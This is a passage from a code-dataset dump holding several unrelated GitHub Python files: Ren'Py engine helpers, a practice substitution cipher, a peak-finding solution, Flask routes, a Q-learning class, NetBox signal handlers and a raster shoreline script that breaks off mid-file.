renpy.music.play() or .queue() instead.\r\n \"\"\"\r\n\r\n renpy.audio.music.play(filename, loop=loops, fadeout=fadeout, fadein=fadein)\r\n\r\ndef music_stop(fadeout=None):\r\n \"\"\"\r\n Deprecated music start function, retained for compatibility. Use\r\n renpy.music.play() or .queue() instead.\r\n \"\"\"\r\n\r\n renpy.audio.music.stop(fadeout=fadeout)\r\n\r\ndef get_filename_line():\r\n \"\"\"\r\n Returns a pair giving the filename and line number of the current\r\n statement.\r\n \"\"\"\r\n\r\n n = renpy.game.script.namemap.get(renpy.game.context().current, None)\r\n \r\n if n is None:\r\n return \"unknown\", 0\r\n else:\r\n return n.filename, n.linenumber\r\n\r\n# A file that log logs to.\r\nlogfile = None\r\n \r\ndef log(msg):\r\n \"\"\"\r\n If config.log is not set, this does nothing. Otherwise, it opens\r\n the logfile (if not already open), formats the message to 70\r\n columns, and prints it to the logfile.\r\n \"\"\"\r\n \r\n global logfile\r\n\r\n if not renpy.config.log:\r\n return\r\n\r\n if msg is None:\r\n return\r\n\r\n if not logfile:\r\n import codecs\r\n\r\n logfile = _file(renpy.config.log, \"a\")\r\n if not logfile.tell():\r\n logfile.write(codecs.BOM_UTF8)\r\n\r\n import textwrap\r\n\r\n print >>logfile, textwrap.fill(msg).encode(\"utf-8\")\r\n logfile.flush()\r\n \r\ndef force_full_redraw():\r\n \"\"\"\r\n Forces the screen to be redrawn in full. Call this after using pygame\r\n to redraw the screen directly.\r\n \"\"\"\r\n\r\n renpy.game.interface.full_redraw = True\r\n\r\ndef do_reshow_say(who, what, interact=False):\r\n \r\n if who is not None:\r\n who = renpy.python.py_eval(who)\r\n\r\n say(who, what, interact=interact)\r\n\r\ncurried_do_reshow_say = curry(do_reshow_say)\r\n \r\ndef get_reshow_say(**kwargs):\r\n return curried_do_reshow_say(\r\n renpy.store._last_say_who,\r\n renpy.store._last_say_what,\r\n **kwargs)\r\n\r\ndef reshow_say(**kwargs):\r\n get_reshow_say()(**kwargs)\r\n\r\ndef current_interact_type():\r\n return getattr(renpy.game.context().info, \"_current_interact_type\", None)\r\n\r\ndef last_interact_type():\r\n return getattr(renpy.game.context().info, \"_last_interact_type\", None)\r\n\r\ndef dynamic(*vars): #@ReservedAssignment\r\n renpy.game.context().make_dynamic(vars)\r\n\r\ndef context_dynamic(*vars): #@ReservedAssignment\r\n renpy.game.context().make_dynamic(vars, context=True)\r\n \r\ndef seen_label(label):\r\n return label in renpy.game.seen_ever\r\n\r\ndef seen_audio(filename):\r\n return filename in renpy.game.persistent._seen_audio\r\n\r\ndef seen_image(name):\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n \r\n return name in renpy.game.persistent._seen_images\r\n\r\ndef file(fn): #@ReservedAssignment\r\n return renpy.loader.load(fn)\r\n\r\ndef image_size(im):\r\n \"\"\"\r\n :doc: other\r\n\r\n Given an image manipulator, loads it and returns a (``width``,\r\n ``height``) tuple giving its size.\r\n\r\n This reads the image in from disk and decompresses it, without\r\n using the image cache. This can be slow.\r\n \"\"\"\r\n \r\n # Index the archives, if we haven't already.\r\n renpy.loader.index_archives()\r\n\r\n im = renpy.easy.displayable(im)\r\n\r\n if not isinstance(im, renpy.display.im.Image):\r\n raise Exception(\"renpy.image_size expects it's argument to be an image.\")\r\n\r\n surf = im.load()\r\n return surf.get_size()\r\n\r\ndef get_at_list(name, layer='master'):\r\n if isinstance(name, basestring):\r\n name = tuple(name.split())\r\n\r\n tag = name[0]\r\n\r\n return renpy.game.context().scene_lists.at_list[layer].get(tag, None)\r\n\r\ndef layer_at_list(at_list, layer='master'):\r\n renpy.game.context().scene_lists.set_layer_at_list(layer, at_list)\r\n\r\ndef free_memory():\r\n force_full_redraw()\r\n renpy.display.interface.kill_textures_and_surfaces()\r\n\r\ndef easy_displayable(d, none=False):\r\n if none:\r\n return renpy.easy.displayable(d)\r\n else:\r\n return renpy.easy.displayable_or_none(d)\r\n\r\ndef quit_event():\r\n renpy.game.interface.quit_event()\r\n\r\ndef iconify():\r\n renpy.game.interface.iconify()\r\n \r\n# New context stuff.\r\ncall_in_new_context = renpy.game.call_in_new_context\r\ncurried_call_in_new_context = renpy.curry.curry(renpy.game.call_in_new_context)\r\ninvoke_in_new_context = renpy.game.invoke_in_new_context\r\ncurried_invoke_in_new_context = renpy.curry.curry(renpy.game.invoke_in_new_context)\r\n\r\n# Error handling stuff.\r\ndef _error(msg):\r\n raise Exception(msg)\r\n \r\n_error_handlers = [ _error ]\r\n \r\ndef push_error_handler(eh):\r\n _error_handlers.append(eh)\r\n\r\ndef pop_error_handler():\r\n _error_handlers.pop()\r\n\r\ndef error(msg):\r\n _error_handlers[-1](msg)\r\n \r\ndef timeout(seconds):\r\n \"\"\"\r\n :doc: udd_utility\r\n \r\n Causes an event to be generated before `seconds` seconds have elapsed.\r\n This ensures that the event method of a user-defined displayable will be\r\n called.\r\n \"\"\"\r\n \r\n renpy.game.interface.timeout(seconds)\r\n\r\ndef scry():\r\n name = renpy.game.context().current\r\n node = renpy.game.script.lookup(name)\r\n return node.scry()\r\n\r\ndef munged_filename():\r\n return renpy.parser.munge_filename(get_filename_line()[0])\r\n\r\n# Module loading stuff.\r\n\r\nloaded_modules = set()\r\n\r\ndef load_module(name, **kwargs):\r\n\r\n if not renpy.game.context().init_phase:\r\n raise Exception(\"Module loading is only allowed in init code.\")\r\n\r\n if name in loaded_modules:\r\n return\r\n\r\n loaded_modules.add(name)\r\n \r\n old_locked = renpy.config.locked\r\n renpy.config.locked = False\r\n \r\n initcode = renpy.game.script.load_module(name)\r\n\r\n context = renpy.execution.Context(False)\r\n context.init_phase = True\r\n renpy.game.contexts.append(context)\r\n \r\n context.make_dynamic(kwargs)\r\n renpy.store.__dict__.update(kwargs) #@UndefinedVariable\r\n \r\n for prio, node in initcode: #@UnusedVariable\r\n renpy.game.context().run(node)\r\n\r\n context.pop_all_dynamic()\r\n \r\n renpy.game.contexts.pop()\r\n\r\n renpy.config.locked = old_locked\r\n\r\ndef pop_return():\r\n renpy.game.context().pop_dynamic()\r\n renpy.game.context().lookup_return(pop=True)\r\n \r\ndef game_menu(screen=None):\r\n if screen is None:\r\n call_in_new_context(\"_game_menu\")\r\n else:\r\n call_in_new_context(\"_game_menu\", screen)\r\n\r\ndef shown_window():\r\n renpy.game.context().scene_lists.shown_window = True\r\n\r\nclass placement(renpy.python.RevertableObject):\r\n def __init__(self, p):\r\n super(placement, self).__init__()\r\n\r\n self.xpos = p[0]\r\n self.ypos = p[1]\r\n self.xanchor = p[2]\r\n self.yanchor = p[3]\r\n self.xoffset = p[4]\r\n self.yoffset = p[5]\r\n self.subpixel = p[6]\r\n\r\ndef get_placement(d):\r\n p = d.get_placement()\r\n\r\n return placement(p)\r\n \r\n# User-Defined Displayable stuff.\r\n\r\nRender = renpy.display.render.Render\r\nrender = renpy.display.render.render\r\nIgnoreEvent = renpy.display.core.IgnoreEvent\r\nredraw = renpy.display.render.redraw\r\n\r\nclass Displayable(renpy.display.core.Displayable, renpy.python.RevertableObject):\r\n pass\r\n\r\nclass Container(renpy.display.core.Displayable, renpy.python.RevertableObject):\r\n _list_type = renpy.python.RevertableList\r\n \r\ndef get_roll_forward():\r\n return renpy.game.interface.shown_window\r\n\r\ndef cache_pin(*args):\r\n \r\n new_pins = renpy.python.RevertableSet()\r\n\r\n for i in args:\r\n\r\n im = renpy.easy.displayable(i)\r\n\r\n if not isinstance(im, renpy.display.im.ImageBase):\r\n raise Exception(\"Cannot pin non-image-manipulator %r\" % im)\r\n\r\n new_pins.add(im)\r\n\r\n renpy.store._cache_pin_set = new_pins | renpy.store._cache_pin_set \r\n\r\n\r\ndef cache_unpin(*args):\r\n \r\n new_pins = renpy.python.RevertableSet()\r\n\r\n for i in args:\r\n\r\n im = renpy.easy.displayable(i)\r\n\r\n if not isinstance(im, renpy.display.im.ImageBase):\r\n raise Exception(\"Cannot unpin non-image-manipulator %r\" % im)\r\n\r\n new_pins.add(im)\r\n\r\n renpy.store._cache_pin_set = renpy.store._cache_pin_set - new_pins\r\n\r\n\r\n# This is a map from a definition to the place where it was\r\n# defined.\r\ndefinitions = collections.defaultdict(list)\r\n\r\ndef call_screen(_screen_name, **kwargs):\r\n \"\"\"\r\n :doc: screens\r\n\r\n The programmatic equivalent of the show screen statement.\r\n \r\n This shows `_screen_name` as a screen, then causes an interaction\r\n to occur. The screen is hidden at the end of the interaction, and\r\n the result of the interaction is returned.\r\n\r\n Keyword arguments not beginning with _ are passed to the scope of\r\n the screen.\r\n \"\"\"\r\n\r\n renpy.exports.mode('screen')\r\n \r\n show_screen(_screen_name, _transient=True, **kwargs)\r\n\r\n roll_forward = renpy.exports.roll_forward_info()\r\n\r\n try:\r\n rv = renpy.ui.interact(mouse=\"screen\", type=\"screen\", roll_forward=roll_forward)\r\n renpy.exports.checkpoint(rv)\r\n except renpy.game.JumpException:\r\n\r\n with_none = renpy.config.implicit_with_none\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n raise\r\n\r\n with_none = renpy.config.implicit_with_none\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n \r\n \r\ndef list_files(common=False):\r\n \"\"\"\r\n :doc: other\r\n\r\n Lists the files in the game directory and archive files. Returns\r\n a list of files, with / as the directory separator.\r\n\r\n `common`\r\n If true, files in the common directory are included in the\r\n listing.\r\n \"\"\"\r\n\r\n rv = [ ]\r\n \r\n for dir, fn in renpy.loader.listdirfiles(): #@ReservedAssignment\r\n\r\n if not common and dir == renpy.config.commondir:\r\n continue\r\n\r\n rv.append(fn)\r\n\r\n return rv\r\n \r\ndef get_renderer_info():\r\n \"\"\"\r\n :doc: other\r\n\r\n Returns a dictionary, giving information about the renderer Ren'Py is\r\n currently using. The dictionary has one required key:\r\n\r\n ``\"renderer\"``\r\n One of ``\"gl\"`` or ``\"sw\"``, corresponding to the OpenGL and\r\n software renderers, respectively.\r\n\r\n ``\"resizable``\r\n True if and only if the window is resizable.\r\n\r\n Other, renderer-specific, keys may also exist. The dictionary should\r\n be treated as immutable. This should only be called once the display\r\n has been started (that is, after the init code is finished).\r\n \"\"\"\r\n\r\n return renpy.display.draw.info\r\n \r\ndef display_reset():\r\n \"\"\"\r\n Used internally. Causes the display to be restarted at the start of\r\n the next interaction.\r\n \"\"\"\r\n \r\n renpy.display.interface.display_reset = True\r\n\r\ndef mode(mode):\r\n \"\"\"\r\n :doc: modes\r\n\r\n Causes Ren'Py to enter the named mode, or stay in that mode if it's\r\n already in it.\r\n \"\"\"\r\n\r\n ctx = renpy.game.context()\r\n\r\n if not ctx.use_modes:\r\n return\r\n\r\n modes = ctx.modes\r\n\r\n try:\r\n ctx.use_modes = False\r\n\r\n if mode != modes[0]: \r\n for c in renpy.config.mode_callbacks:\r\n c(mode, modes)\r\n\r\n finally:\r\n ctx.use_modes = True \r\n \r\n if mode in modes:\r\n modes.remove(mode)\r\n modes.insert(0, mode)\r\n\r\ndef notify(message):\r\n \"\"\"\r\n :doc: other\r\n\r\n Causes Ren'Py to display the `message` using the notify screen. By\r\n default, this will cause the message to be dissolved in, displayed\r\n for two seconds, and dissolved out again.\r\n\r\n This is useful for actions that otherwise wouldn't produce feedback,\r\n like screenshots or quicksaves.\r\n\r\n Only one notification is displayed at a time. If a second notification\r\n is displayed, the first notification is replaced. \r\n \"\"\"\r\n\r\n hide_screen('notify')\r\n show_screen('notify', message=message)\r\n restart_interaction()\r\n\r\ndef variant(name):\r\n \"\"\"\r\n :doc: screens\r\n\r\n Returns true if a `name` is a screen variant that can be chosen\r\n by Ren'Py. See :ref:`screen-variants` for more details. This function\r\n can be used as the condition in a python if statement to set up the\r\n appropriate styles for the selected screen variant.\r\n \"\"\"\r\n\r\n return name in renpy.config.variants\r\n\r\ndef vibrate(duration):\r\n \"\"\"\r\n :doc: other\r\n\r\n Causes the device to vibrate for `duration` seconds. Currently, this\r\n is only supported on Android.\r\n \"\"\"\r\n\r\n try:\r\n import android #@UnresolvedImport\r\n android.vibrate(duration)\r\n except:\r\n pass\r\n \r\n\r\n# The attributes that are applied to the current say statement.\r\nsay_attributes = None\r\n \r\ndef get_say_attributes():\r\n \"\"\"\r\n :doc: other\r\n\r\n Gets the attributes associated with the current say statement, or\r\n None if no attributes are associated with this statement.\r\n\r\n This is only valid when executing or predicting a say statement.\r\n \"\"\"\r\n\r\n return say_attributes\r\n\r\nside_image_attributes = None\r\n\r\ndef get_side_image(prefix_tag, image_tag=None, not_showing=True, layer='master'):\r\n \"\"\"\r\n :doc: other\r\n \r\n This attempts to find an image to show as the side image. \r\n \r\n It begins by determining a set of image attributes. If `image_tag` is \r\n given, it gets the image attributes from the tag. Otherwise, it gets\r\n them from the currently showing character.\r\n \r\n It then looks up an image with the tag `prefix_tag` and those attributes,\r\n and returns it if it exists. \r\n \r\n If not_showing is True, this only returns a side image if the image the\r\n attributes are taken from is not on the screen.\r\n \"\"\"\r\n\r\n images = renpy.game.context().images\r\n\r\n if image_tag is not None:\r\n attrs = (image_tag,) + images.get_attributes(layer, image_tag)\r\n else:\r\n attrs = side_image_attributes\r\n \r\n if not attrs:\r\n return None\r\n \r\n if not_showing and images.showing(layer, (attrs[0], )):\r\n return None\r\n \r\n required = set()\r\n optional = set(attrs)\r\n \r\n return images.choose_image(prefix_tag, required, optional, None)\r\n\r\ndef get_physical_size():\r\n \"\"\"\r\n :doc: other\r\n \r\n Returns the size of the physical window.\r\n \"\"\"\r\n \r\n return renpy.display.draw.get_physical_size()\r\n\r\ndef set_physical_size(size):\r\n \"\"\"\r\n :doc: other\r\n \r\n Attempts to set the size of the physical window to size. This has the \r\n side effect of taking the screen out of windowed mode.\r\n \"\"\"\r\n\r\n renpy.game.preferences.fullscreen = False\r\n \r\n if get_renderer_info()[\"resizable\"]:\r\n renpy.display.interface.set_mode(size)\r\n \r\ndef fsencode(s):\r\n \"\"\"\r\n :doc: other\r\n \r\n Converts s from unicode to the filesystem encoding.\r\n \"\"\"\r\n \r\n if not isinstance(s, unicode):\r\n return s\r\n \r\n fsencoding = sys.getfilesystemencoding() or \"utf-8\"\r\n return s.encode(fsencoding, \"replace\")\r\n\r\ndef fsdecode(s):\r\n \"\"\"\r\n :doc: other\r\n \r\n Converts s from filesystem encoding to unicode.\r\n \"\"\"\r\n \r\n if not isinstance(s, str):\r\n return s\r\n \r\n fsencoding = sys.getfilesystemencoding() or \"utf-8\"\r\n return s.decode(fsencoding)\r\n\r\nfrom renpy.editor import launch_editor\r\n\r\n","repo_name":"paktek123/Renpy-Board-Framework","sub_path":"project_s/renpy/exports.py","file_name":"exports.py","file_ext":"py","file_size_in_byte":49677,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"25737182156","text":"#!/usr/bin/env python3\n'''\nThis program will encrypt a user provided text file against a random key.\nThis is intended to offer practice to the user for frequency analyses decryption\nof a substitution cypher\n'''\n\nimport random\n\n# Define the alphabet to be used by the rest of the script\n# Add additional characters or spaces if desired, though this\n# will change the normal frequency of each character!\nalph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nkey = ''\nkeygen = list(alph)\nmapper = {}\n\n# Generate a random key for the encryption based on the alphabet defined above\nfor l in range(len(alph)):\n key += random.choice(keygen)\n keygen.remove(key[-1])\n\n# Create mapper dictionary for the encryption\ni = 0\nfor x in key:\n mapper[x] = alph[i]\n i +=1\n\n# Swap these lines if a dynamic PT is desired\n# pt = 'pt.txt'\npt = input(\"What is the name of the plaintext file?: \")\n\n# Save Plaintext as a string\nwith open(pt) as f:\n ptstring = f.read()\n\n# Create cypher text using plaintext string and mapper dictionary\nct = ''\nfor let in ptstring.upper():\n if let in alph:\n ct += mapper[let]\n\n# add spaces to final out string so it is in groups of 5 letters\ni = 0\nfin = ''\nfor let in ct:\n if i % 5 == 0:\n fin += ' ' + let \n\n else:\n fin += let\n \n i += 1\n \n# Save out string to a file for review\nwith open('out.txt', 'w') as f:\n f.write(fin)\n","repo_name":"arcolvin/cryptoPractice","sub_path":"Substitution_Cipher/substitute.py","file_name":"substitute.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28410686986","text":"####### two standard #######\nclass Solution:\n \"\"\"\n @param A: An integers array.\n @return: return any of peek positions.\n \"\"\"\n def findPeak(self, A):\n # A can be represented as a list of ++--++--\n # the first would be +, while the last would be - \n # find any ind that are +- \n if A is None or len(A) == 0:\n return -1 \n \n start, end = 0, len(A) - 1 \n while start + 1 < end:\n mid = start + (end - start) // 2 \n if mid > 0 and A[mid] < A[mid - 1]:\n end = mid \n elif mid > 0:\n if A[mid] > A[mid + 1]:\n return mid \n else:\n start = mid\n\n if start > 0 and A[start] > A[start - 1] and A[start] > A[start + 1]:\n return start \n # if end < len(A) - 1 and A[end] > A[end - 1] and A[end] > A[end + 1]:\n # return end \n \n return -1\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/Binary Search/find-peak-element.py","file_name":"find-peak-element.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10111066313","text":"from app import db\nfrom api.models.user import User\nfrom api.models.test import Test\nfrom flask import request, Blueprint, make_response, jsonify\nfrom sqlalchemy.sql.expression import func, select\nuser_bp = Blueprint(\"user\", __name__, url_prefix=\"/api/user\")\n\n\n@user_bp.route(\"/\", methods=[\"POST\"])\ndef handle_new_user():\n if request.method == \"POST\":\n request_body = request.get_json()\n new_user = User(\n name=request_body[\"name\"],\n email=request_body[\"email\"])\n try:\n db.session.add(new_user)\n db.session.commit()\n user_response = {\n \"id\": new_user.id,\n \"name\": new_user.name,\n \"email\": new_user.email\n }\n return make_response(user_response, 201)\n except Exception as e:\n print(e)\n return make_response(f\"User was not created. Missing required fields.\", 400)\n\n\n@user_bp.route(\"/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef handle_text_by_id(user_id):\n user = User.query.get(user_id)\n if not user:\n return make_response(f\"User #{user_id} Not Found\", 404)\n\n if request.method == \"GET\":\n user_response = {\n \"name\": user.name,\n \"email\": user.email\n }\n return make_response(user_response, 200)\n elif request.method == \"PUT\":\n form_data = request.get_json()\n\n user.name = form_data[\"name\"]\n user.email = form_data[\"email\"]\n\n db.session.commit()\n user_response = {\n \"id\": user.id,\n \"name\": user.name,\n \"email\": user.email\n }\n return make_response(user_response, 200)\n elif request.method == \"DELETE\":\n db.session.delete(user)\n db.session.commit()\n return make_response(f\"User # {user.id} successfully deleted\", 200)\n\n\n@user_bp.route(\"//tests\", methods=[\"GET\"])\ndef handle_user_tests(user_id):\n user = User.query.get(user_id)\n if not user:\n return make_response(f\"User #{user_id} Not Found\", 404)\n\n if request.method == \"GET\":\n tests = Test.query.filter_by(user_id=user.id).order_by(Test.id.desc())\n tests_response = []\n\n for test in tests:\n tests_response.append({\n \"id\": test.id,\n \"user_id\": test.user_id,\n \"category\": test.category,\n \"accuracy\": test.accuracy,\n \"timer\": test.timer,\n \"totalWordCount\": test.totalWordCount,\n \"wordsPerMin\": test.wordsPerMin,\n \"create_date\": test.create_date\n })\n user_response = {\n \"tests\": tests_response\n }\n return make_response(jsonify(user_response), 200)\n","repo_name":"gitburd/type-time","sub_path":"api/routes/userRoutes.py","file_name":"userRoutes.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28567193873","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 29 14:09:53 2019\r\n\r\n@author: Srujan Panuganti\r\n\"\"\"\r\n\r\nimport numpy as np\r\n#import itertools \r\nfrom operator import add\r\nimport random\r\nimport copy\r\n\r\n\r\nclass q_learn:\r\n def __init__(self,\r\n total_actions,q_table,learning_rate = 0.6,discount_factor = 0.7,epsilon=0.6):\r\n\r\n self.total_actions = total_actions\r\n self.q_table = q_table\r\n \r\n self.number_of_states = 2** (self.total_actions)\r\n self.all_actions = [ 2**j for j in range(0,self.total_actions)]\r\n self.lin_space = list(range(0,self.total_actions))\r\n \r\n self.action_index = {}\r\n \r\n for key,val in zip(self.all_actions,self.lin_space ):\r\n self.action_index[key] = val\r\n\r\n\r\n self.learning_rate = learning_rate\r\n self.discount_factor = discount_factor \r\n self.epsilon = epsilon\r\n\r\n def maximum_q(self, current_state, possible_actions):\r\n max_q = 0\r\n index = 0\r\n max_i = 0\r\n optimal_action = 0\r\n #print('here',possible_actions)\r\n\r\n for act in possible_actions:\r\n if self.q_table[current_state][self.action_index[act]][1] >= max_q:\r\n max_q = max_q\r\n optimal_action = act\r\n \r\n max_i = index\r\n index +=1\r\n #print('papa')\r\n return max_q,optimal_action,max_i\r\n\r\n\r\n def epsilon_greedy(self, current_state, possible_actions):\r\n \r\n \r\n pos_act = copy.deepcopy(possible_actions)\r\n \r\n max_q, optimal_action, max_i = self.maximum_q(current_state, pos_act)\r\n \r\n return optimal_action\r\n","repo_name":"srujanpanuganti/Dots-and-Boxes-Reinforcement-Learning","sub_path":"3x3 Random agent/q_algorithm.py","file_name":"q_algorithm.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18654011344","text":"from multiprocessing import Pool\r\n\r\nimport time,os,random\r\n\r\ndef fu(num):\r\n for i in range(random.randint(1,6)):\r\n print(\"--%s开始运行---pid=%d\"%(num,os.getpid()))\r\n time.sleep(1)\r\n\r\nif __name__ == '__main__':\r\n po =Pool(3)\r\n\r\n for i in range(0,10):\r\n print(\"----%d----\"%i)\r\n po.apply_async(fu,(i,))\r\n\r\n print(\"----start----\")\r\n\r\n po.close()\r\n po.join()\r\n print(\"----over----\")","repo_name":"giant-xf/python","sub_path":"untitled/2.0-小白进阶篇/2.02-Linux系统编程/进程/复习/复习--进程池.py","file_name":"复习--进程池.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17067371334","text":"from django.db.models.signals import post_save, pre_delete\nfrom django.dispatch import receiver\n\nfrom .models import Cable, Device, VirtualChassis\n\n\n@receiver(post_save, sender=VirtualChassis)\ndef assign_virtualchassis_master(instance, created, **kwargs):\n \"\"\"\n When a VirtualChassis is created, automatically assign its master device to the VC.\n \"\"\"\n if created:\n Device.objects.filter(pk=instance.master.pk).update(virtual_chassis=instance, vc_position=None)\n\n\n@receiver(pre_delete, sender=VirtualChassis)\ndef clear_virtualchassis_members(instance, **kwargs):\n \"\"\"\n When a VirtualChassis is deleted, nullify the vc_position and vc_priority fields of its prior members.\n \"\"\"\n Device.objects.filter(virtual_chassis=instance.pk).update(vc_position=None, vc_priority=None)\n\n\n@receiver(post_save, sender=Cable)\ndef update_connected_endpoints(instance, **kwargs):\n \"\"\"\n When a Cable is saved, check for and update its two connected endpoints\n \"\"\"\n\n # Cache the Cable on its two termination points\n if instance.termination_a.cable != instance:\n instance.termination_a.cable = instance\n instance.termination_a.save()\n if instance.termination_b.cable != instance:\n instance.termination_b.cable = instance\n instance.termination_b.save()\n\n # Check if this Cable has formed a complete path. If so, update both endpoints.\n endpoint_a, endpoint_b, path_status = instance.get_path_endpoints()\n if endpoint_a is not None and endpoint_b is not None:\n endpoint_a.connected_endpoint = endpoint_b\n endpoint_a.connection_status = path_status\n endpoint_a.save()\n endpoint_b.connected_endpoint = endpoint_a\n endpoint_b.connection_status = path_status\n endpoint_b.save()\n\n\n@receiver(pre_delete, sender=Cable)\ndef nullify_connected_endpoints(instance, **kwargs):\n \"\"\"\n When a Cable is deleted, check for and update its two connected endpoints\n \"\"\"\n endpoint_a, endpoint_b, _ = instance.get_path_endpoints()\n\n # Disassociate the Cable from its termination points\n if instance.termination_a is not None:\n instance.termination_a.cable = None\n instance.termination_a.save()\n if instance.termination_b is not None:\n instance.termination_b.cable = None\n instance.termination_b.save()\n\n # If this Cable was part of a complete path, tear it down\n if hasattr(endpoint_a, 'connected_endpoint') and hasattr(endpoint_b, 'connected_endpoint'):\n endpoint_a.connected_endpoint = None\n endpoint_a.connection_status = None\n endpoint_a.save()\n endpoint_b.connected_endpoint = None\n endpoint_b.connection_status = None\n endpoint_b.save()\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/dcim/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"17542664660","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n'''\nimg = cv2.imread(\"Fondo.jpg\")\nprint(img)\ncv2.imshow('Prueba',img)\ncv2.waitKey(0)\n'''\n\ndef procesarImagen(direccionImagen):\n imagen = cv2.imread(direccionImagen)\n filasImagen = 0\n for filas in range(0, imagen.rows):\n for columnas in range(0, imagen.cols):\n colorAzul = imagen.at(filas, columnas)[0];\n print(colorAzul)\n return \n\nprocesarImagen(\"Fondo.jpg\")\n\n'''\n\nvoid uploadImageOneInfo(vector> &pImageOneInfo){\n /*\n Purpose: \n -Load the first image information and converts it to a matrix of colors for futures functionalities.\n Paramateres: \n -Recieves an empty matrix who is going to be filled with RGB colors.\n Returns: \n -Nothing. Void\n */\n \n string imagePath = \"C:/Users/luist/OneDrive/Escritorio/Proyecto1/Prueba1.png\";\n Mat colorImage = imread(imagePath);\n if(existsImage(colorImage)){\n int blueChannel; int greenChannel; int redChannel;\n int rowsImageOneInfo =0;\n for (int imageRows = 0; imageRows < colorImage.rows; imageRows+=54){\n for (int imageColumns = 0; imageColumns < colorImage.cols; imageColumns++) {\n redChannel = colorImage.at(imageRows, imageColumns)[2];\n greenChannel = colorImage.at(imageRows, imageColumns)[1];\n blueChannel = colorImage.at(imageRows, imageColumns)[0];\n\n Pixel addingPixel = Pixel(redChannel,greenChannel,blueChannel);\n\n pImageOneInfo[rowsImageOneInfo][imageColumns] = addingPixel;\n \n }\n rowsImageOneInfo++;\n }\n }\n else{\n exit(1);\n }\n \n}\n\n'''\n","repo_name":"LuisAraya2309/GeneticAlgorithms","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71416423273","text":"#This script is used to clip the raster file and get the shoreline following the sea level rise determined by user\n\nimport json\nimport shapely\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom osgeo import gdal\nfrom shapely.geometry import Point\nfrom shapely.geometry.polygon import Polygon\n\n#open the raster file\nelev_array=gdal.Open(r'/Users/ziyangliu/Downloads/WA_SEW_dems/WA_SEW1_GCS_5m_NAVD88m.tif')\nwidth=elev_array.RasterXSize \nheight=elev_array.RasterYSize\nulx, xres, xskew, uly, yskew, yres = elev_array.GetGeoTransform()\nprint(width,height)\nprint(uly+yres*height)\n#boundary of the clipped def file\nc_ulx, c_uly=-124.1610,46.9198\nc_lrx, c_lry= -124.0611,uly+yres*height\n# path to where you want the clipped raster\noutputSrtm = \"/Users/ziyangliu/Downloads/WA_SEW_dems/clip_WA_SEW1_GCS_5m_NAVD88m.tif\"\ngdal.Translate(outputSrtm , elev_array, \n projWin = (c_ulx, c_uly,\n c_lrx, c_lry)) # OR [ulx, uly, lrx, lry]\n\nc_elev_array=gdal.Open(r'/Users/ziyangliu/Downloads/WA_SEW_dems/clip_WA_SEW1_GCS_5m_NAVD88m.tif')\n\nc_width=c_elev_array.RasterXSize \nc_height=c_elev_array.RasterYSize\nc_ulx, c_xres, c_xskew, c_uly, c_yskew, c_yres = c_elev_array.GetGeoTransform()\nprint(\"before clip \",width,height,ulx, xres, xskew, uly, yskew, yres)\nprint(\"after clip \",c_width,c_height,c_ulx, c_xres, c_xskew, c_uly, c_yskew, c_yres)\n\nband1 = c_elev_array.GetRasterBand(1).ReadAsArray()\n\ndef getCoordinate(i,j):\n lon=c_ulx+c_xres*(j+1)\n lat=c_uly+c_yres*(i+1)\n return [lon,lat]\n\ndef elev_slr (x):\n mt = x*0.3048 #get the amount of sea level rise in unit of meter from feet\n band_mt = band1 - mt\n return band_mt\n\n#define a function, to determine the case of the rectangle. 15 cases in total (see wikipedia \"marching squares\" for reference)\n#a is the top left, b is the top right, c is the bottom right, d is the bottom left, in the clockwise sequence\n#a, b, c, d are not the index, they're values of the referred point\ndef case(a,b,c,d):\n if a>0:\n if b>0:\n if c>0:\n if d>0:\n case_num=\"0\"\n else:\n case_num=\"1\"\n else:\n if d>0:\n case_num=\"2\"\n else:\n case_num=\"3\"\n else:\n if c>0:\n if d>0:\n case_num=\"4\"\n else:\n case_num=\"5\"\n else:\n if d>0:\n case_num=\"6\"\n else:\n case_num=\"7\"\n else:\n if b>0:\n if c>0:\n if d>0:\n case_num=\"8\"\n else:\n case_num=\"9\"\n else:\n if d>0:\n case_num=\"10\"\n else:\n case_num=\"11\"\n else:\n if c>0:\n if d>0:\n case_num=\"12\"\n else:\n case_num=\"13\"\n else:\n if d>0:\n case_num=\"14\"\n else:\n case_num=\"15\"\n return case_num\n\nline_list=[]\nfor y in np.arange(len(band1[0])-1):\n print(y)\n for x in np.arange(145,2047):\n matrix_slr=elev_slr(1)\n top_left_elev = matrix_slr[x][y]\n top_right_elev = matrix_slr[x][y+1]\n bottom_left_elev = matrix_slr[x+1][y]\n bottom_right_elev = matrix_slr[x+1][y+1]\n caseNum=case(top_left_elev,top_right_elev,bottom_right_elev,bottom_left_elev)\n if caseNum==\"0\" or caseNum==\"15\":\n continue\n #if it is case 5 or 10, then we need to get the value of the saddle point\n elif 